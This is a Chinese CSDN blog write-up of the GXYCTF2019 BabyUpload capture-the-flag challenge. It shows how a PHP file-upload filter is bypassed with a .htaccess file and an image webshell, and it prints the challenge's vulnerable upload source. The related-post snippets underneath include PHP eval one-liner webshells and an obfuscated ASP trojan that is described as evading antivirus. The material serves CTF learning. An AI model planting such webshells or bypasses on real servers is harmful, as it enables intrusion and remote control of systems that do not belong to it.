web:[GXYCTF2019]BabyUpload(文件上传、一句话木马、文件过滤)

已于 2023-12-07 23:40:08 修改
阅读量513 收藏 1
点赞数
分类专栏: BUUCTF-WEB 文章标签: 网络安全 web安全
于 2023-12-07 23:38:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/134843523
版权

题目

页面显示为文件上传

随便上传一个文件看看

上传一个文本文件显示

上传了一个图片显示

上传包含一句话木马的图片

上传了一个包含php一句话木马的文件,显示如上

换一个写法

上传成功

尝试上传.htaccess,上传失败,用抓包修改文件后缀

返回题目首页,找到了题目源码

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> 
<title>Upload</title>
<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
上传文件<input type=\"file\" name=\"uploaded\" />
<input type=\"submit\" name=\"submit\" value=\"上传\" />
</form>";
error_reporting(0);
if(!isset($_SESSION['user'])){
    $_SESSION['user'] = md5((string)time() . (string)rand(100, 1000));
}
if(isset($_FILES['uploaded'])) {
    $target_path  = getcwd() . "/upload/" . md5($_SESSION['user']);
    $t_path = $target_path . "/" . basename($_FILES['uploaded']['name']);
    $uploaded_name = $_FILES['uploaded']['name'];
    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,'.') + 1);
    $uploaded_size = $_FILES['uploaded']['size'];
    $uploaded_tmp  = $_FILES['uploaded']['tmp_name'];
 
    if(preg_match("/ph/i", strtolower($uploaded_ext))){
        die("后缀名不能有ph!");
    }
    else{
        if ((($_FILES["uploaded"]["type"] == "
            ") || ($_FILES["uploaded"]["type"] == "image/jpeg") || ($_FILES["uploaded"]["type"] == "image/pjpeg")) && ($_FILES["uploaded"]["size"] < 2048)){
            $content = file_get_contents($uploaded_tmp);
            if(preg_match("/\<\?/i", $content)){
                die("诶,别蒙我啊,这标志明显还是php啊");
            }
            else{
                mkdir(iconv("UTF-8", "GBK", $target_path), 0777, true);
                move_uploaded_file($uploaded_tmp, $t_path);
                echo "{$t_path} succesfully uploaded!";
            }
        }
        else{
            die("上传类型也太露骨了吧!");
        }
    }
}
?>

文件后缀名为image/jpeg,抓包修改文件后缀名

然后使用蚁剑连接

或者使用show_source() 函数,进行post传参

别的解法:

[GXYCTF2019]BabyUpload wp_文件上传ph被过滤了ctf-CSDN博客

sleepywin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]BabyUpload - 文件上传+绕过(后缀&文件类型&文件内容&.htaccess)
oZuoShen123的博客
10-11 574
1、上传一句话,提示“后缀不允许ph” 2、修改后缀为jpg,提示“上传类型也太露骨了吧!” 3、修改类型为image/jpeg,提示“诶,别蒙我啊,这标志明显还是php啊” 4、修改一句话的标识为: @eval($_POST["pwd"]); 5、上传.htaccess
CTFHub_技能树_Web文件上传——“无验证”_PHP的一句话木马
Ho1aAs‘s Blog
07-23 685
文章目录使用工具解题步骤Ⅰ、编写ShellⅡ、蚁剑访问根目录完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 中国蚁剑 解题步骤 本题需要上传shell后从网页文件夹获取到FLAG Ⅰ、编写Shell #PHP <?php echo "PHP Loaded"; //便于确认是否成功上传 eval(@$_POST['a']); ?> 验证是否成功上传 Ⅱ、蚁剑访问根目录 添加数据 URL地址填写服务器根目录中shell的地
CTF-Web(3)文件上传漏洞
大表哥的博客
10-26 4602
一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境,而。
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1243
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件
web-ctf】ctf-pikachu-fileupload
一个努力生活的人的博客
08-21 980
ctf-pikachu-fileupload
一句话木马要点和防范注意事项
最新发布
05-24
一句话木马要点和防范注意事项
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
Web应用安全:任意文件上传.pptx
06-20
于是猜测可能是文件过滤,由于先前能正常上传png文件,于是用HxD打开一个png文件,在文件尾写入一段木马,如右图所示。 任意文件上传 3、测试如何绕过过滤 上传修改后的png图片。 任意文件上传 3、测试如何绕过...
攻防世界CTF题:upload1
Aixwei的博客
04-11 947
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
攻防_漏洞_文件上传_文件上传漏洞详解
redglare的博客
10-22 2362
文件上传漏洞详解
ctf技能树----文件上传
qq_44418229的博客
05-10 1109
ctf技能树----文件上传
wmm的学习日记(文件上传漏洞)
swmmbswzy的博客
11-25 1286
关于CTF中web方向里的文件上传漏洞的简单介绍学习
CTF实战练习:文件上传漏洞+文件包含漏洞
热门推荐
烟雨天青色
08-06 1万+
BugkuCTF:文件包含2 CTF实战练习:http://120.78.xx.xxx:8013 这道题目看起来又像是跟前一道题是差不多的样子,继续先查看index.php里面的内容: 哎~这次好像显示的并不是base64编码的内容,但是感觉起来这个信息一点用都没有,第二步,查看网页源代码: 从网页源代码里我们可以看出在JS脚本里包含了一个html页面,我们现在来访问一下这个页...
dvwa之 file upload (medium)一句话木马、burpsuit、中国菜刀
crowsec
05-02 2052
Medium级:由此可以看到,medium中,限定了文件的上传类型,只允许JPEG或者是png格式的文件,直接上传php文件会显示失败,所以这个时候需要使用burpsuit进行修改包。(法1)将文件修改为pass.png,直接点击上传,然后修改burpsuit中数据然后显示上传成功,直接使用中国菜刀进行连接即可。    法二在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项...
上传漏洞-一句话木马
Coisini的博客
05-30 8423
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
CTFweb篇-一句话木马
weixin_44597701的博客
08-05 5334
什么是一句话木马 一句话木马就是将一段代码植入服务器中,然后通过蚁剑就可以直接拿到webshell 最简单的一句话木马: <?php @eval($_POST['attack']) ?> 通常这句话就能让密码为attack,至于为什么,这需要祥看蚁剑的原理 为了防止D盾的阻拦,经常可以使用不同的混淆来绕开D盾 一句话木马的条件 (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 例题 先用御剑扫描一下 发现后台地址 然后进入输入root 密码空(至于为什
CTF-web 第五部分 简单的上传绕过与中国菜刀
iamsongyu的博客
10-12 7787
对于上传文件来说,通常会采用的几种方式如下:客户端文件类型检测,客户端文件内容检测,服务器端检测。对于这几种检测,我们通常使用的策略是使用burp suite进行修改,或者是对文件扩展名进行变化等。常用的场景是通过上传漏洞,将一句话木马传到服务端,然后在进一步渗透服务器。 (1)客户端文件类型检测 php的exist file_get reaquire include等存在00截断漏洞 php&l...
一句话木马图片转换成php
01-28
一句话木马图片转换成php是指将一个包含恶意代码的图片文件一句话木马)转换为可执行的php代码。这种操作通常是为了绕过一些安全策略,将恶意代码注入到目标系统中,从而实施各种攻击,如窃取用户信息、篡改网页...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值